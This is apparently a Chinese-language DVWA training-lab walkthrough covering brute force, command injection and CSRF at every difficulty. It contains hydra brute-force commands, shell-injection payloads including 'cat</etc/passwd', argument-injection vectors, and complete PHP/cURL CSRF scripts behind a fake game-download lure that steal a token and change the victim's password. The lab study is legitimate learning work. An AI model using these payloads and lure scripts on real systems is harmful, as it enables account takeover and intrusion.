dvwa：暴力破解、命令注入、csrf全难度详解

暴力破解

easy模式
hydra -L /usr/share/wordlists/SecLists-master/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/SecLists-master/Passwords/500-worst-passwords.txt 192.168.72.1 http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login#:H=Cookie\: security=low; PHPSESSID=481b089a941d0aecc848227e2e90202e:Username and/or password incorrect."
​
添加登陆路径、用户名占位符、密码占位符、添加请求头、错误返回的字符串
http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login#:H=Cookie\: security=low; PHPSESSID=481b089a941d0aecc848227e2e90202e:Username and/or password incorrect."
​
登陆路径：/dvwa/vulnerabilities/brute/
用户名和密码占位符：username=^USER^&password=^PASS^&Login=Login#
添加请求头：H=Cookie\: security=low; PHPSESSID=481b089a941d0aecc848227e2e90202e（注意冒号转位）
添加错误返回的字符串：Username and/or password incorrect.
​
[80][http-get-form] host: 192.168.72.1   login: admin   password: password
​

medium一样能爆破出，但会睡眠2秒

high模式加了一个token，但是加了token跟不加token都能爆破出来
​
hydra -L usernames.txt -P password.txt 192.168.72.1 http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login&user_token=564d1b908f7b4a9e975d00bc707fab3e:H=Cookie\: security=high; PHPSESSID=481b089a941d0aecc848227e2e90202e:Username and/or password incorrect."
​
hydra -L usernames.txt -P password.txt 192.168.72.1 http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie\: security=high; PHPSESSID=481b089a941d0aecc848227e2e90202e:Username and/or password incorrect."
​
hydra -L usernames.txt -P password.txt 192.168.72.1 http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie\: security=high;:Username and/or password incorrect."

impossible代码逻辑：
如果登录失败，更新数据库使得用户登录失败次数+1，如果登录失败次数超过3次，account_locked将为false，下次登陆时必须等待 15分钟才会将account_locked设置为true
但是就算等待了15分钟，代码并没有将登陆失败次数清零，所以一旦登陆失败一次，就直接锁住
​
注：impossible是post，其他难度都是get

命令注入

外部命令注入：

• ;（分号）：允许您按顺序执行多个命令。

• &&（AND）：仅当第一个命令成功（返回零退出状态）时才执行第二个命令。

• ||（或）：仅当第一个命令失败（返回非零退出状态）时才执行第二个命令。

• &（后台）：在后台执行命令，允许用户继续使用shell。

• |（管道）：获取第一个命令的输出并将其用作第二个命令的输入。

• < (重定向) ：将后者输出重定向前者输入

  这种方法甚至不需要<前面是个正常的linux命令、即使报错也会输出<后面的执行结果

payload：
127.0.0.1 & whoami
适用于linux（这种方法甚至不需要<前面是个正常的linux命令、即使报错也会输出<后面的执行结果）：
127.0.0.1 < "`whoami`"
127.0.0.1 < "$(whoami)"

medium
        '&&' => '',
        ';' => ''
        
payload：
127.0.0.1 & whoami
127.0.0.1 | whoami
127.0.0.1 &;& whoami
适用于linux：
127.0.0.1 < "`whoami`"
127.0.0.1 < "$(whoami)"

high
        '&'  => '',
        ';'  => '',
        '| ' => '',
        '-'  => '',
        '$'  => '',
        '('  => '',
        ')'  => '',
        '`'  => '',
        '||' => '',
"| "成为了黑名单，但是"|"去掉空格还能使用
​
payload：
127.0.0.1 |whoami

impossible
通过.将ip分开，判断分离的数量是否为4，且判断这4部分是否都是数字，这两个条件成立，才会执行ping命令

命令注入其他扩展

参数注入

当您只能将参数附加到现有命令时，即可获得命令执行权。

查询参数注入的网站：Argument Injection Vectors

• chrome

  chrome '--gpu-launcher="id>/tmp/foo"'

• SSH

  ssh '-oProxyCommand="touch /tmp/foo"' foo@foo

• 查询语言

  psql -o'|id>/tmp/foo'

字符串内部命令注入

• 反引号

• $()

• payload1：
  echo "`ip a`" echo "$(ip a)" payload2： 其他命令< "`whoami`"

空格替换

${IFS}替换
cat${IFS}flag.txt
​
重定向符号替换
cat</etc/passwd
127.0.0.1<"$(whoami)"

csrf

基本思路：构造一个html钓鱼网页，钓鱼网页上有访问dvwa网站修改密码的链接，但是我发现一个问题，就是如果钓鱼网页上直接就是：http://192.168.72.1/dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change#的话，我们只能操控get请求的数据，不能操控header的数据和post提交的数据，而且最大的问题在于被攻击的人点击这个链接，请求头里有：H=Cookie\: security=impossible; PHPSESSID=481b089a941d0aecc848227e2e90202e，也就是说默认就是困难难度而且网页get请求不能操控header修改不了难度，所以需要使用vps写一个php服务构造恶意请求并发送

easy

前端钓鱼代码

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <h3>下载游戏</h3>
    <a href="http://192.168.72.1/dvwa/csrf.php">赛博朋克2077</a>
</body>
</html>

php伪造请求（csrf.php）

<?php
// 设置要返回的 HTML 内容
$htmlContent = '
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Custom Page</title>
</head>
<body>
<h1>赛博朋克下载</h1>
<p>赛博朋克下载成功</p>
</body>
</html>
';
​
// 设置响应头，告诉浏览器返回的内容是 HTML
header('Content-Type: text/html');
​
// 输出 HTML 内容
echo $htmlContent;
​
$url = 'http://192.168.72.1/dvwa/vulnerabilities/csrf/'; // 要发送请求的 URL
​
// GET 数据
$get_data = array(
    'password_new' => '6666',
    'password_conf' => '6666',
    'Change' => 'Change'
);
​
// 自定义请求头
$headers = array(
    'Cookie: PHPSESSID=a0u9pif21dqn9hq1115geuujnk; security=easy',
);
​
// 初始化 cURL
$ch = curl_init();
​
// 设置 URL 和其他 cURL 选项
curl_setopt($ch, CURLOPT_URL, $url . '?' . http_build_query($get_data)); // 将 GET 数据添加到 URL
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); // 设置自定义请求头
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
​
// 执行 cURL 请求
$response = curl_exec($ch);
​
// 检查是否有错误发生
if($response === false) {
    echo 'cURL error: ' . curl_error($ch);
} else {
    // 打印响应
    echo $response;
}
​
// 关闭 cURL 资源
curl_close($ch);
?>

点击后：

同时修改密码成功

medium

需要简单配置：

• phpstudy给网站个域名，如下图

• linux攻击机器添加host头

vim /etc/hosts
192.168.72.1    www.oswe.com

为什么需要以上配置：

因为后端代码的判断
变量$_SERVER[ 'HTTP_REFERER' ]是否有$_SERVER[ 'SERVER_NAME' ]，如果有，则说明当前修改密码的请求是从本网站跳转过来的，而不是从钓鱼网站跳转过来的，
而$_SERVER[ 'SERVER_NAME' ]这个变量实际上就是你的域名，为了能使我们的linux能解析到域名所以添加hosts头

源码的判断：

if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ){
    # 正常
}
else{
    # 错误
}
​
其中
$_SERVER[ 'HTTP_REFERER' ] = 请求头里的referer  
$_SERVER[ 'SERVER_NAME' ] = 域名www.oswe.com
​
如果请求头的referer中存在域名www.oswe.com，执行正常功能

篡改请求头referer

$headers = array(
    'Cookie: PHPSESSID=a0u9pif21dqn9hq1115geuujnk; security=medium',
    'Referer: http://www.oswe.com/dvwa/vulnerabilities/csrf/'
);

前端钓鱼代码

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <h3>下载游戏</h3>
    <a href="http://192.168.72.1/dvwa/csrf.php">赛博朋克2077</a>
</body>
</html>

后端php伪造恶意请求代码（csrf.php）

<?php
// 设置要返回的 HTML 内容
$htmlContent = '
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Custom Page</title>
</head>
<body>
<h1>赛博朋克下载</h1>
<p>赛博朋克下载成功</p>
</body>
</html>
';
​
// 设置响应头，告诉浏览器返回的内容是 HTML
header('Content-Type: text/html');
​
// 输出 HTML 内容
echo $htmlContent;
​
$url = 'http://192.168.72.1/dvwa/vulnerabilities/csrf/'; // 要发送请求的 URL
​
// GET 数据
$get_data = array(
    'password_new' => '6666',
    'password_conf' => '6666',
    'Change' => 'Change'
);
​
// 自定义请求头
$headers = array(
    'Cookie: PHPSESSID=a0u9pif21dqn9hq1115geuujnk; security=medium',
    'Referer: http://www.oswe.com/dvwa/vulnerabilities/csrf/'
);
​
// 初始化 cURL
$ch = curl_init();
​
// 设置 URL 和其他 cURL 选项
curl_setopt($ch, CURLOPT_URL, $url . '?' . http_build_query($get_data)); // 将 GET 数据添加到 URL
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); // 设置自定义请求头
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
​
// 执行 cURL 请求
$response = curl_exec($ch);
​
// 检查是否有错误发生
if($response === false) {
    echo 'cURL error: ' . curl_error($ch);
} else {
    // 打印响应
    echo $response;
}
​
// 关闭 cURL 资源
curl_close($ch);
?>

hard

array_key_exists 函数
— 检查数组里是否有指定的键名或索引
数组里有键 key 时，array_key_exists() 返回 true。 key 可以是任何能作为数组索引的值。
主要检查提交的数据是否完整：
if (array_key_exists("user_token", $_REQUEST) &&
        array_key_exists("password_new", $_REQUEST) &&
        array_key_exists("password_conf", $_REQUEST) &&
        array_key_exists("Change", $_REQUEST))
​
checkToken 函数
检测请求包的token和用户的会话token是否一致：
if ($_SESSION[ 'session_token' ] === $_REQUEST["user_token"])

关于token

这里的token是一开始请求固定在html页面的表单里的，每一次的请求都会更新一次token的值，我们需要先劫持token然后再伪造请求，固定在表单里的token如下：
​
<form action="#" method="GET">
            New password:<br />
            <input type="password" AUTOCOMPLETE="off" name="password_new"><br />
            Confirm new password:<br />
            <input type="password" AUTOCOMPLETE="off" name="password_conf"><br />
            <br />
            <input type="submit" value="Change" name="Change">
            <input type='hidden' name='user_token' value='8a5cd4cae342ac86000a7abb1d65a5fa' />
</form>

思路：

• 构造恶意链接，链接向dvwa的high模式下的csrf页面请求两次

  • 第一次请求是为了获取到固定在表单里的token

  • 第二次请求是为了使用这个token来修改密码

前端钓鱼代码

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <h3>下载游戏</h3>
    <a href="http://192.168.72.1/dvwa/csrf.php">赛博朋克2077</a>
    <a href="http://192.168.72.1/dvwa/csrf_token.php">巫师3</a>
</body>
</html>

​
其中csrf.php是之前的没有token模式的恶意php请求
csrf_token.php是我们请求两次的恶意php请求

php恶意请求代码csrf_token.php

<?php
// 设置要返回的 HTML 内容
$htmlContent = '
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Custom Page</title>
</head>
<body>
<h1>赛博朋克下载</h1>
<p>赛博朋克下载成功</p>
</body>
</html>
';
// 初始化 cURL
$ch = curl_init();
​
$url = 'http://192.168.72.1/dvwa/vulnerabilities/csrf/';
​
$headers = array(
    'Cookie: PHPSESSID=a0u9pif21dqn9hq1115geuujnk; security=high',
    'Referer: http://www.oswe.com/dvwa/vulnerabilities/csrf/'
);
​
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); // 设置自定义请求头
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
​
// 执行 cURL 请求并将结果保存到 $html 变量中
$html = curl_exec($ch);
​
​
// 创建一个 DOMDocument 对象并载入 HTML 内容
$dom = new DOMDocument();
@$dom->loadHTML($html);
​
// 获取所有的 input 标签
$inputElements = $dom->getElementsByTagName('input');
​
$userTokenValue = null;
​
// 遍历所有的 input 标签，查找 name 为 user_token 的元素
foreach ($inputElements as $element) {
    if ($element->getAttribute('name') === 'user_token') {
        // 输出 user_token 的值
        $userTokenValue = $element->getAttribute('value');
        break; // 找到后跳出循环
    }
}
if ($userTokenValue) {
    echo "使用了如下token修改密码：". $userTokenValue;
} else {
    echo "user_token not found";
}
​
​
// 设置响应头，告诉浏览器返回的内容是 HTML
header('Content-Type: text/html');
​
// 输出 HTML 内容
echo $htmlContent;
​
// GET 数据
$get_data = array(
    'password_new' => '8888',
    'password_conf' => '8888',
    'Change' => 'Change',
    'user_token' => $userTokenValue
);
​
​
// 设置 URL 和其他 cURL 选项
curl_setopt($ch, CURLOPT_URL, $url . '?' . http_build_query($get_data)); // 将 GET 数据添加到 URL
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); // 设置自定义请求头
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
​
// 执行 cURL 请求
$response = curl_exec($ch);
​
// 检查是否有错误发生
// if($response === false) {
//     echo 'cURL error: ' . curl_error($ch);
// } else {
//     // 打印响应
//     echo $response;
// }
​
// 关闭 cURL 资源
curl_close($ch);
?>

这里点的是巫师3，但显示下载成功的是赛博朋克，是因为这个返回页面我懒得该，直接返回的字符串

impossible

修改密码前，输入当前密码来身份验证，导致csrf请求伪造无法获取用户凭据